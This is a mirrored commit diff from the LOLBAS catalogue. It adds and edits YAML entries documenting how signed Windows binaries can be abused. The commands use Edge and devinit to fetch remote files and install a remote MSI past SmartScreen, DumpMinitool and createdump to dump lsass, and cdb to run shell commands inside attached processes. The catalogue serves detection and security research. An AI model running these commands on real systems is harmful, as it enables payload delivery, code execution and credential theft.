mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-29 00:08:11 +01:00
Several LOLBINs additions & modifications (#192)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
parent
a9046ecb85
commit
787c87470e
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
Name: Explorer.exe
|
Name: Explorer.exe
|
||||||
Description: Binary used for managing files and system components within Windows
|
Description: Binary used for managing files and system components within Windows
|
||||||
Author: 'Jai Minton'
|
Author: Jai Minton
|
||||||
Created: 2020-06-24
|
Created: 2020-06-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||||
@ -21,8 +21,6 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||||
Code_Sample:
|
|
||||||
- Code:
|
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
|
||||||
|
29
yml/OSBinaries/Msedge.yml
Normal file
29
yml/OSBinaries/Msedge.yml
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
---
|
||||||
|
Name: Msedge.exe
|
||||||
|
Description: Microsoft Edge browser
|
||||||
|
Author: mr.d0x
|
||||||
|
Created: 2022-01-20
|
||||||
|
Commands:
|
||||||
|
- Command: msedge.exe https://example.com/file.exe.txt
|
||||||
|
Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
|
||||||
|
Usecase: Download file from the internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
- Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
|
||||||
|
Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
|
||||||
|
Usecase: Download file from the internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
|
||||||
|
- Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/mrd0x/status/1478116126005641220
|
||||||
|
- Link: https://twitter.com/mrd0x/status/1478234484881436672
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: mr.d0x
|
||||||
|
Handle: '@mrd0x'
|
@ -41,7 +41,7 @@ Detection:
|
|||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
|
||||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
|
- Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
|
||||||
- Link: https://twitter.com/nas_bench/status/1534916659676422152
|
- Link: https://twitter.com/nas_bench/status/1534916659676422152
|
||||||
- Link: https://twitter.com/nas_bench/status/1534915321856917506
|
- Link: https://twitter.com/nas_bench/status/1534915321856917506
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
Name: Cdb.exe
|
Name: Cdb.exe
|
||||||
Description: Debugging tool included with Windows Debugging Tools.
|
Description: Debugging tool included with Windows Debugging Tools.
|
||||||
Author: 'Oddvar Moe'
|
Author: Oddvar Moe
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
|
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
|
||||||
@ -12,8 +12,8 @@ Commands:
|
|||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: |
|
- Command: |
|
||||||
cdb.exe -pd -pn <process_name>
|
cdb.exe -pd -pn <process_name>
|
||||||
.shell <cmd>
|
.shell <cmd>
|
||||||
Description: Attaching to any process and executing shell commands.
|
Description: Attaching to any process and executing shell commands.
|
||||||
Usecase: Run a shell command under a trusted Microsoft signed binary
|
Usecase: Run a shell command under a trusted Microsoft signed binary
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -41,7 +41,7 @@ Resources:
|
|||||||
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
||||||
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||||
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||||
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
|
- Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
|
||||||
- Link: https://twitter.com/nas_bench/status/1534957360032120833
|
- Link: https://twitter.com/nas_bench/status/1534957360032120833
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt Graeber
|
- Person: Matt Graeber
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Createdump.exe
|
Name: Createdump.exe
|
||||||
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
|
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
|
||||||
Author: Daniel Santos
|
Author: mr.d0x, Daniel Santos
|
||||||
Created: 2022-08-05
|
Created: 2022-01-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: createdump.exe -n -f dump.dmp [PID]
|
- Command: createdump.exe -n -f dump.dmp [PID]
|
||||||
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
|
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
|
||||||
@ -13,6 +13,9 @@ Commands:
|
|||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
|
- Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
|
||||||
|
- Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
|
||||||
|
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
|
||||||
|
21
yml/OtherMSBinaries/Devinit.yml
Normal file
21
yml/OtherMSBinaries/Devinit.yml
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
---
|
||||||
|
Name: Devinit.exe
|
||||||
|
Description: Visual Studio 2019 tool
|
||||||
|
Author: mr.d0x
|
||||||
|
Created: 2022-01-20
|
||||||
|
Commands:
|
||||||
|
- Command: devinit.exe run -t msi-install -i https://example.com/out.msi
|
||||||
|
Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
|
||||||
|
Usecase: Executes code from a (remote) MSI file.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218.007
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/mrd0x/status/1460815932402679809
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: mr.d0x
|
||||||
|
Handle: '@mrd0x'
|
20
yml/OtherMSBinaries/DumpMinitool.yml
Normal file
20
yml/OtherMSBinaries/DumpMinitool.yml
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
---
|
||||||
|
Name: DumpMinitool.exe
|
||||||
|
Description: Dump tool part Visual Studio 2022
|
||||||
|
Author: mr.d0x
|
||||||
|
Created: 2022-01-20
|
||||||
|
Commands:
|
||||||
|
- Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
|
||||||
|
Description: Creates a memory dump of the lsass process
|
||||||
|
Usecase: Create memory dump and parse it offline
|
||||||
|
Category: Dump
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1003.001
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/mrd0x/status/1511415432888131586
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: mr.d0x
|
||||||
|
Handle: '@mrd0x'
|
21
yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
Normal file
21
yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
---
|
||||||
|
Name: Microsoft.NodejsTools.PressAnyKey.exe
|
||||||
|
Description: Part of the NodeJS Visual Studio tools.
|
||||||
|
Author: mr.d0x
|
||||||
|
Created: 2022-01-20
|
||||||
|
Commands:
|
||||||
|
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
|
||||||
|
Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
|
||||||
|
Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/mrd0x/status/1463526834918854661
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: mr.d0x
|
||||||
|
Handle: '@mrd0x'
|
Loading…
Reference in New Issue
Block a user